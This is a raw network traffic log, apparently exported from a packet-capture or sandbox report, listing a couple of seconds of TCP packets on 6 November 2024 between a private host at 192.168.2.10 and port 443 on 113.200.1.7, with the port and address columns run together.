                                                                                                                                            Nov 6, 2024 16:40:50.522142887 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.522165060 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.522300959 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.522329092 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.522368908 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.522533894 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.522547007 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.522603035 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.522607088 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.522641897 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.558705091 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.558725119 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.558926105 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.558940887 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.558989048 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.578908920 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.578924894 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.579035044 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.579058886 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.579119921 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.579606056 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.579619884 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.579690933 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.579699993 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.579741001 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.580976963 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.580991030 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.581052065 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.581059933 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.581103086 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.584281921 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.584296942 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.584357023 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.584367037 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.584407091 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.584531069 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.584547043 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.584611893 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.584615946 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.584657907 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.641444921 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.641463995 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.641731977 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.641758919 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.641822100 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.677110910 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.677129984 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.677273035 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.677308083 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.677366972 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.678013086 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.678034067 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.678073883 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.678080082 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.678103924 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.678123951 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.700088024 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.700103045 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.700182915 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.700197935 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.702697039 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.702716112 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.702761889 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.702768087 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.702797890 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.702807903 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.702821016 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.702843904 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.702850103 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.702888966 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.702914000 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.702928066 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.702972889 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:50.702977896 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:50.707593918 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.180490971 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.180496931 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.180509090 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.180527925 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.180531025 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.180542946 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.180560112 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.180599928 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.181245089 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.181262970 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.181308985 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.181327105 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.181344986 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.181372881 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.237803936 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.237829924 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.237992048 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.238071918 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.238168955 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.238188982 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.238266945 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.238284111 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.238344908 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.274533033 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.274549961 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.274677038 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.274744034 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.274820089 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.285615921 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.285631895 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.285682917 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.285706997 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.285768986 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.296622038 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.296639919 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.296705961 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.296736956 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.296808958 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.297065020 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.297086000 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.297144890 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.297151089 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.297197104 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.299299002 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.299319029 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.299367905 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.299381018 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.299426079 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.299756050 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.299770117 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.299818993 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.299824953 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.299865961 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.300434113 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.300448895 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.300506115 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.300513029 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.300563097 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.300863028 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.300878048 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.300930977 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.300935984 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.300977945 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.357346058 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.357364893 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.357495070 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.357536077 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.357600927 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.357657909 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.357671022 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.357753992 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.357767105 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.357851982 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.393738031 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.393760920 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.393961906 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.393985987 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.394063950 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.404902935 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.404917002 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.405028105 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.405091047 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.405149937 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.415077925 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.415093899 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.415159941 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.415183067 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.415229082 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.416121960 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.416137934 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.416212082 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.416224003 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.416268110 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.419872999 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.419887066 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.419950962 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.419969082 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.420016050 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.420265913 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.420279980 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.420336008 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.420341969 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.420384884 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.420533895 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.420552969 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.420600891 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.420605898 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.420651913 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.421468019 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.421483040 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.421538115 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.421542883 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.421586037 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.421681881 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.421695948 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.421749115 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.421753883 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.421797991 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.476809978 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.476828098 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.476933956 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.477004051 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.477049112 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.477066994 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.477102995 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.477121115 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.477147102 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.477164984 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.513097048 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.513122082 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.513257027 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.513281107 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.513333082 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.524295092 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.524317980 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.524393082 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.892911911 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.892942905 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893029928 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.893049002 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893096924 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893100977 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.893105984 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893119097 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893134117 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.893168926 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.893172979 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893205881 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.893404007 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893418074 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893462896 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.893466949 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893502951 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.893831015 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893845081 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893877029 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.893881083 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893907070 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.893925905 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.897936106 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.897954941 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.898021936 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.898027897 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.898066044 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.898758888 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.898797035 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.898850918 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.898855925 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.898895979 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.899122000 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.899136066 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.899193048 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.899195910 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.899233103 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.900775909 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.900794029 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.900842905 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.900847912 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.900881052 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.901299953 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.901314020 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.901366949 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.901371002 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.901402950 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.953665972 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.953690052 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.953767061 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.953777075 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.953826904 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.954000950 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.954015970 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.954072952 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.954077005 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.954112053 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.954549074 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.954565048 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.954622030 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.954624891 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.954679966 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.990446091 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.990462065 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.990550041 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.990556002 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.990616083 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.012264013 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.012280941 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.012377024 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.012382030 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.012444019 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.012593031 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.012608051 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.012660980 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.012664080 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.012707949 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.012841940 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.012859106 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.012916088 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.012919903 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.012953997 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.013277054 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.013290882 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.013344049 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.013346910 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.013386011 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.017205000 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.017219067 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.017273903 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.017277002 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.017309904 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.017429113 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.017443895 CET44357356113.200.1.7192.168.2.10
